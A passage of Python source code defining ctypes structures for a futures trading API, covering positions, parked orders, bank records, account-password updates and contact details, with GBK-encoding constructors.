super().__init__()
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
class TransferBank(Struct):
_fields_ = [
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
("BankName", c_char_Array_101),
("IsActive", c_int),
]
def __init__(self, BankID=None, BankBrchID=None, BankName=None, IsActive=None):
super().__init__()
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
if BankName:
self.BankName = BankName.encode("GBK")
if IsActive:
self.IsActive = IsActive
class QryInvestorPositionDetail(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class InvestorPositionDetail(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("Direction", c_char),
("OpenDate", c_char_Array_9),
("TradeID", c_char_Array_21),
("Volume", c_int),
("OpenPrice", c_double),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("TradeType", c_char),
("CombInstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("CloseProfitByDate", c_double),
("CloseProfitByTrade", c_double),
("PositionProfitByDate", c_double),
("PositionProfitByTrade", c_double),
("Margin", c_double),
("ExchMargin", c_double),
("MarginRateByMoney", c_double),
("MarginRateByVolume", c_double),
("LastSettlementPrice", c_double),
("SettlementPrice", c_double),
("CloseVolume", c_int),
("CloseAmount", c_double),
("TimeFirstVolume", c_int),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, HedgeFlag=None, Direction=None, OpenDate=None, TradeID=None, Volume=None, OpenPrice=None, TradingDay=None, SettlementID=None, TradeType=None, CombInstrumentID=None, ExchangeID=None, CloseProfitByDate=None, CloseProfitByTrade=None, PositionProfitByDate=None, PositionProfitByTrade=None, Margin=None, ExchMargin=None, MarginRateByMoney=None, MarginRateByVolume=None, LastSettlementPrice=None, SettlementPrice=None, CloseVolume=None, CloseAmount=None, TimeFirstVolume=None, InvestUnitID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if TradeID:
self.TradeID = TradeID.encode("GBK")
if Volume:
self.Volume = Volume
if OpenPrice:
self.OpenPrice = OpenPrice
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if TradeType:
self.TradeType = TradeType.encode("GBK")
if CombInstrumentID:
self.CombInstrumentID = CombInstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if CloseProfitByDate:
self.CloseProfitByDate = CloseProfitByDate
if CloseProfitByTrade:
self.CloseProfitByTrade = CloseProfitByTrade
if PositionProfitByDate:
self.PositionProfitByDate = PositionProfitByDate
if PositionProfitByTrade:
self.PositionProfitByTrade = PositionProfitByTrade
if Margin:
self.Margin = Margin
if ExchMargin:
self.ExchMargin = ExchMargin
if MarginRateByMoney:
self.MarginRateByMoney = MarginRateByMoney
if MarginRateByVolume:
self.MarginRateByVolume = MarginRateByVolume
if LastSettlementPrice:
self.LastSettlementPrice = LastSettlementPrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if CloseVolume:
self.CloseVolume = CloseVolume
if CloseAmount:
self.CloseAmount = CloseAmount
if TimeFirstVolume:
self.TimeFirstVolume = TimeFirstVolume
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class TradingAccountPassword(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, Password=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class MDTraderOffer(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
("ParticipantID", c_char_Array_11),
("Password", c_char_Array_41),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("TraderConnectStatus", c_char),
("ConnectRequestDate", c_char_Array_9),
("ConnectRequestTime", c_char_Array_9),
("LastReportDate", c_char_Array_9),
("LastReportTime", c_char_Array_9),
("ConnectDate", c_char_Array_9),
("ConnectTime", c_char_Array_9),
("StartDate", c_char_Array_9),
("StartTime", c_char_Array_9),
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("MaxTradeID", c_char_Array_21),
("MaxOrderMessageReference", c_char_Array_7),
]
def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallID=None, OrderLocalID=None, TraderConnectStatus=None, ConnectRequestDate=None, ConnectRequestTime=None, LastReportDate=None, LastReportTime=None, ConnectDate=None, ConnectTime=None, StartDate=None, StartTime=None, TradingDay=None, BrokerID=None, MaxTradeID=None, MaxOrderMessageReference=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if TraderConnectStatus:
self.TraderConnectStatus = TraderConnectStatus.encode("GBK")
if ConnectRequestDate:
self.ConnectRequestDate = ConnectRequestDate.encode("GBK")
if ConnectRequestTime:
self.ConnectRequestTime = ConnectRequestTime.encode("GBK")
if LastReportDate:
self.LastReportDate = LastReportDate.encode("GBK")
if LastReportTime:
self.LastReportTime = LastReportTime.encode("GBK")
if ConnectDate:
self.ConnectDate = ConnectDate.encode("GBK")
if ConnectTime:
self.ConnectTime = ConnectTime.encode("GBK")
if StartDate:
self.StartDate = StartDate.encode("GBK")
if StartTime:
self.StartTime = StartTime.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if MaxTradeID:
self.MaxTradeID = MaxTradeID.encode("GBK")
if MaxOrderMessageReference:
self.MaxOrderMessageReference = MaxOrderMessageReference.encode("GBK")
class QryMDTraderOffer(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("TraderID", c_char_Array_21),
]
def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QryNotice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class Notice(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("Content", c_char_Array_501),
("SequenceLabel", c_char_Array_2),
]
def __init__(self, BrokerID=None, Content=None, SequenceLabel=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if Content:
self.Content = Content.encode("GBK")
if SequenceLabel:
self.SequenceLabel = SequenceLabel.encode("GBK")
class UserRight(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserRightType", c_char),
("IsForbidden", c_int),
]
def __init__(self, BrokerID=None, UserID=None, UserRightType=None, IsForbidden=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserRightType:
self.UserRightType = UserRightType.encode("GBK")
if IsForbidden:
self.IsForbidden = IsForbidden
class QrySettlementInfoConfirm(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, InvestorID=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class LoadSettlementInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class BrokerWithdrawAlgorithm(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("WithdrawAlgorithm", c_char),
("UsingRatio", c_double),
("IncludeCloseProfit", c_char),
("AllWithoutTrade", c_char),
("AvailIncludeCloseProfit", c_char),
("IsBrokerUserEvent", c_int),
("CurrencyID", c_char_Array_4),
("FundMortgageRatio", c_double),
("BalanceAlgorithm", c_char),
]
def __init__(self, BrokerID=None, WithdrawAlgorithm=None, UsingRatio=None, IncludeCloseProfit=None, AllWithoutTrade=None, AvailIncludeCloseProfit=None, IsBrokerUserEvent=None, CurrencyID=None, FundMortgageRatio=None, BalanceAlgorithm=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if WithdrawAlgorithm:
self.WithdrawAlgorithm = WithdrawAlgorithm.encode("GBK")
if UsingRatio:
self.UsingRatio = UsingRatio
if IncludeCloseProfit:
self.IncludeCloseProfit = IncludeCloseProfit.encode("GBK")
if AllWithoutTrade:
self.AllWithoutTrade = AllWithoutTrade.encode("GBK")
if AvailIncludeCloseProfit:
self.AvailIncludeCloseProfit = AvailIncludeCloseProfit.encode("GBK")
if IsBrokerUserEvent:
self.IsBrokerUserEvent = IsBrokerUserEvent
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if FundMortgageRatio:
self.FundMortgageRatio = FundMortgageRatio
if BalanceAlgorithm:
self.BalanceAlgorithm = BalanceAlgorithm.encode("GBK")
class TradingAccountPasswordUpdateV1(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OldPassword", c_char_Array_41),
("NewPassword", c_char_Array_41),
]
def __init__(self, BrokerID=None, InvestorID=None, OldPassword=None, NewPassword=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OldPassword:
self.OldPassword = OldPassword.encode("GBK")
if NewPassword:
self.NewPassword = NewPassword.encode("GBK")
class TradingAccountPasswordUpdate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("OldPassword", c_char_Array_41),
("NewPassword", c_char_Array_41),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, OldPassword=None, NewPassword=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if OldPassword:
self.OldPassword = OldPassword.encode("GBK")
if NewPassword:
self.NewPassword = NewPassword.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class QryCombinationLeg(Struct):
_fields_ = [
("CombInstrumentID", c_char_Array_31),
("LegID", c_int),
("LegInstrumentID", c_char_Array_31),
]
def __init__(self, CombInstrumentID=None, LegID=None, LegInstrumentID=None):
super().__init__()
if CombInstrumentID:
self.CombInstrumentID = CombInstrumentID.encode("GBK")
if LegID:
self.LegID = LegID
if LegInstrumentID:
self.LegInstrumentID = LegInstrumentID.encode("GBK")
class QrySyncStatus(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
]
def __init__(self, TradingDay=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
class CombinationLeg(Struct):
_fields_ = [
("CombInstrumentID", c_char_Array_31),
("LegID", c_int),
("LegInstrumentID", c_char_Array_31),
("Direction", c_char),
("LegMultiple", c_int),
("ImplyLevel", c_int),
]
def __init__(self, CombInstrumentID=None, LegID=None, LegInstrumentID=None, Direction=None, LegMultiple=None, ImplyLevel=None):
super().__init__()
if CombInstrumentID:
self.CombInstrumentID = CombInstrumentID.encode("GBK")
if LegID:
self.LegID = LegID
if LegInstrumentID:
self.LegInstrumentID = LegInstrumentID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if LegMultiple:
self.LegMultiple = LegMultiple
if ImplyLevel:
self.ImplyLevel = ImplyLevel
class SyncStatus(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("DataSyncStatus", c_char),
]
def __init__(self, TradingDay=None, DataSyncStatus=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if DataSyncStatus:
self.DataSyncStatus = DataSyncStatus.encode("GBK")
class QryLinkMan(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class LinkMan(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("PersonType", c_char),
("IdentifiedCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("PersonName", c_char_Array_81),
("Telephone", c_char_Array_41),
("Address", c_char_Array_101),
("ZipCode", c_char_Array_7),
("Priority", c_int),
("UOAZipCode", c_char_Array_11),
("PersonFullName", c_char_Array_101),
]
def __init__(self, BrokerID=None, InvestorID=None, PersonType=None, IdentifiedCardType=None, IdentifiedCardNo=None, PersonName=None, Telephone=None, Address=None, ZipCode=None, Priority=None, UOAZipCode=None, PersonFullName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if PersonType:
self.PersonType = PersonType.encode("GBK")
if IdentifiedCardType:
self.IdentifiedCardType = IdentifiedCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if PersonName:
self.PersonName = PersonName.encode("GBK")
if Telephone:
self.Telephone = Telephone.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if ZipCode:
self.ZipCode = ZipCode.encode("GBK")
if Priority:
self.Priority = Priority
if UOAZipCode:
self.UOAZipCode = UOAZipCode.encode("GBK")
if PersonFullName:
self.PersonFullName = PersonFullName.encode("GBK")
class QryBrokerUserEvent(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserEventType", c_char),
]
def __init__(self, BrokerID=None, UserID=None, UserEventType=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserEventType:
self.UserEventType = UserEventType.encode("GBK")
class BrokerUserEvent(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserEventType", c_char),
("EventSequenceNo", c_int),
("EventDate", c_char_Array_9),
("EventTime", c_char_Array_9),
("UserEventInfo", c_char_Array_1025),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, UserID=None, UserEventType=None, EventSequenceNo=None, EventDate=None, EventTime=None, UserEventInfo=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if UserEventType:
self.UserEventType = UserEventType.encode("GBK")
if EventSequenceNo:
self.EventSequenceNo = EventSequenceNo
if EventDate:
self.EventDate = EventDate.encode("GBK")
if EventTime:
self.EventTime = EventTime.encode("GBK")
if UserEventInfo:
self.UserEventInfo = UserEventInfo.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class QryContractBank(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
]
def __init__(self, BrokerID=None, BankID=None, BankBrchID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
class ContractBank(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
("BankName", c_char_Array_101),
]
def __init__(self, BrokerID=None, BankID=None, BankBrchID=None, BankName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBrchID:
self.BankBrchID = BankBrchID.encode("GBK")
if BankName:
self.BankName = BankName.encode("GBK")
class InvestorPositionCombineDetail(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("OpenDate", c_char_Array_9),
("ExchangeID", c_char_Array_9),
("SettlementID", c_int),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ComTradeID", c_char_Array_21),
("TradeID", c_char_Array_21),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("Direction", c_char),
("TotalAmt", c_int),
("Margin", c_double),
("ExchMargin", c_double),
("MarginRateByMoney", c_double),
("MarginRateByVolume", c_double),
("LegID", c_int),
("LegMultiple", c_int),
("CombInstrumentID", c_char_Array_31),
("TradeGroupID", c_int),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, TradingDay=None, OpenDate=None, ExchangeID=None, SettlementID=None, BrokerID=None, InvestorID=None, ComTradeID=None, TradeID=None, InstrumentID=None, HedgeFlag=None, Direction=None, TotalAmt=None, Margin=None, ExchMargin=None, MarginRateByMoney=None, MarginRateByVolume=None, LegID=None, LegMultiple=None, CombInstrumentID=None, TradeGroupID=None, InvestUnitID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ComTradeID:
self.ComTradeID = ComTradeID.encode("GBK")
if TradeID:
self.TradeID = TradeID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if TotalAmt:
self.TotalAmt = TotalAmt
if Margin:
self.Margin = Margin
if ExchMargin:
self.ExchMargin = ExchMargin
if MarginRateByMoney:
self.MarginRateByMoney = MarginRateByMoney
if MarginRateByVolume:
self.MarginRateByVolume = MarginRateByVolume
if LegID:
self.LegID = LegID
if LegMultiple:
self.LegMultiple = LegMultiple
if CombInstrumentID:
self.CombInstrumentID = CombInstrumentID.encode("GBK")
if TradeGroupID:
self.TradeGroupID = TradeGroupID
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class ParkedOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("UserForceClose", c_int),
("ExchangeID", c_char_Array_9),
("ParkedOrderID", c_char_Array_13),
("UserType", c_char),
("Status", c_char),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("IsSwapOrder", c_int),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, ExchangeID=None, ParkedOrderID=None, UserType=None, Status=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, AccountID=None, CurrencyID=None, ClientID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if UserForceClose:
self.UserForceClose = UserForceClose
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParkedOrderID:
self.ParkedOrderID = ParkedOrderID.encode("GBK")
if UserType:
self.UserType = UserType.encode("GBK")
if Status:
self.Status = Status.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if IsSwapOrder:
self.IsSwapOrder = IsSwapOrder
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ParkedOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("OrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("LimitPrice", c_double),
("VolumeChange", c_int),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("ParkedOrderActionID", c_char_Array_13),
("UserType", c_char),
("Status", c_char),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, UserID=None, InstrumentID=None, ParkedOrderActionID=None, UserType=None, Status=None, ErrorID=None, ErrorMsg=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeChange:
self.VolumeChange = VolumeChange
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ParkedOrderActionID:
self.ParkedOrderActionID = ParkedOrderActionID.encode("GBK")
if UserType:
self.UserType = UserType.encode("GBK")
if Status:
self.Status = Status.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryParkedOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryParkedOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class RemoveParkedOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ParkedOrderID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, ParkedOrderID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ParkedOrderID:
self.ParkedOrderID = ParkedOrderID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class RemoveParkedOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ParkedOrderActionID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, ParkedOrderActionID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ParkedOrderActionID:
self.ParkedOrderActionID = ParkedOrderActionID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class InvestorWithdrawAlgorithm(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorRange", c_char),
("InvestorID", c_char_Array_13),
("UsingRatio", c_double),
("CurrencyID", c_char_Array_4),
("FundMortgageRatio", c_double),
]
def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, UsingRatio=None, CurrencyID=None, FundMortgageRatio=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if UsingRatio:
self.UsingRatio = UsingRatio
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if FundMortgageRatio:
self.FundMortgageRatio = FundMortgageRatio
class QryInvestorPositionCombineDetail(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("CombInstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, CombInstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
